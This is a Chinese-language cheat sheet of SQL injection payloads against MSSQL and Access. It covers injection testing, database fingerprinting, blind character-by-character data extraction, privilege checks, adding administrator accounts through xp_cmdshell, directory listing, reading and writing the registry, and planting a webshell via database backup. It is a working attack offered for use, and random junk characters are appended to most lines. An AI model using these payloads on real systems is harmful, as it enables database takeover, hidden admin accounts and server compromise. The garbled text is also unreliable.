1.判断是否有注入;and 1=1 ;and 1=2 .6K>"
2.初步判断是否是mssql ;and user>0 Iqsk\2W]a3
aW"!bAdx`,
3.注入参数是字符'and [查询条件] and ''=' zjA/Z(
c
#kV+n<
4.搜索时没过滤参数的'and [查询条件] and '%25'=' *3$,f>W^
HhvG#Sam!
5.判断数据库系统 {<kG{i/
Z=0W@_s
;and (select count(*) from sysobjects)>0 mssql =FmU]DV
MxR U6+a
;and (select count(*) from msysobjects)>0 access D@^ZpN8r
uNbA>*c4M
/<0D
E22
$T6Qg(p
6.猜数据库 ;and (select Count(*) from [数据库名])>0
qR qy
yjd'{B9{
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 `dP+5u!
*K|aK p}
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 D.(G 9H
Rs`a@Fn
9.(1)猜字段的ascii值(access) &>e DCs
YJ$ewK4E#.
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 B5:g{,C
er0D5f R
(2)猜字段的ascii值(mssql) yf) `jPM1<
-`OR6jd
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 2~V Im#
Yys~p2
10.测试权限结构(mssql) hli10p$
#-T.@a1X
/BM1AV{s6
Nz*sD^SJa
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- |Vi&f5p,@
n#Roz5/U
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- (:QQ7xc{}
aLi_Hrb9
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Z~c'h
M"^Vf{X^
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 5vft}f
@@83PJFid
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- _wNPA1q0J
b`W*vduf
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- |*KS<iHr%
"<x~{BN?
;and 1=(select IS_MEMBER('db_owner'));-- lGUV(D
oDP((I2-
</gp3WQ.
AwUc{h l<
11.添加mssql和系统的帐户 OZD!#YI
87KrSZ
;exec master.dbo.sp_addlogin username;-- {~fCqP.2
;exec master.dbo.sp_password null,username,password;-- c1kxKxE
]<gCq/V #
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- KC:4
YX`=M
;exec master.dbo.xp_cmdshell 'net user username password T:dm0i au
_AYC|R|
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- RX5.bVp
eE
kLt9;<L
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ;#s}b1
2BDan^:-Av
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- DBJA}Cw
lVdT^"~3
*3O >J"
zN+*R;Ds
12.(1)遍历目录 xs!g{~V{
1Xr"h:U_X
;create table dirs(paths varchar(100), id int) u\R`IZ&O
QZ3(u<f
;insert dirs exec master.dbo.xp_dirtree 'c:\' HDVl5X`j'
fu<2t$Cn>
;and (select top 1 paths from dirs)>0 `E5"Pmg
rA1r#ksQ
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) u=;nU(]M '
rLh9`0|D
VS|("**
g'ZMV6b?K
(2)遍历目录 UIOEkQ\Wl
Z.':&7Y
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- BwJ^_:(p~
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 b/B`&CIA0"
Y^2Qxo3"3
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 6WN(22Io
C`n9/[,#
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 96pk[5lj{?
Tz[?gF.Do
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 kAN;S<jSE
eR-=<0Iw;
y[p$/$bgC5
ml.;wB|
13.mssql中的存储过程 #M?F^u[
LxlbD#<V
xp_regenumvalues 注册表根键, 子键 7~"(+f
J+b!6t}mZn
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 /3Nb
Pc)VK>.fc
xp_regread 根键,子键,键值名 P:(EU s}0
.L7Yf+yFg
;exec xp_regread /^LH
0UGiPH,()
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 d"I28PIS"
'DzBp
xp_regwrite 根键,子键, 值名, 值类型, 值 8.CKH4h
)!k_Gb`#X
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 8b 8\
)ojx_3j8
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Nxb\[
E-sSRt
xp_regdeletevalue 根键,子键,值名 cc41b*ci$
R6q4 ["
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 z0 2}&^Zzk
/&$"}Z6z
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 TTZ['HP
oI
wI!
+L&Q
t0e{|du
^+*GbY$'
14.mssql的backup创建webshell hB?,7-
VJN/#
use model x^)g'16`
^p 2.UW
create table cmd(str image); `u#;MUg
2"leUur~rO
insert into cmd(str) values (''); 1Sg|3T8bGT
G;C8Kde
backup database model to disk='c:\l.asp'; {jOzap|
T+;H#&
)C>}"#J>
ZU-4})7uSB
15.mssql内置函数 M!Z*QY."P
hIVI\U,
;and (select @@version)>0 获得Windows的版本号 3cOY0Z#T
dUoWo3r=
;and user_name()='dbo' 判断当前系统的连接用户是不是sa E+}GxFG-:
;GE26Ymqly
;and (select user_name())>0 爆当前系统的连接用户 &@YFje6Lcm
n .f4z<
;and (select db_name())>0 得到当前连接的数据库 B;z;vrrL
@sw9A93A
Y^R?Q'
|P~O15V*Q
16.简洁的webshell #)^^_
s~=KhP~
use model qr)v'aC3
uW}Hvj;0a*
create table cmd(str image); URYZV8=B~
q.=^iz&m
insert into cmd(str) values (''); &|Lh38s@$#
#puQi
backup database model to disk='g:\wwwtest\l.asp';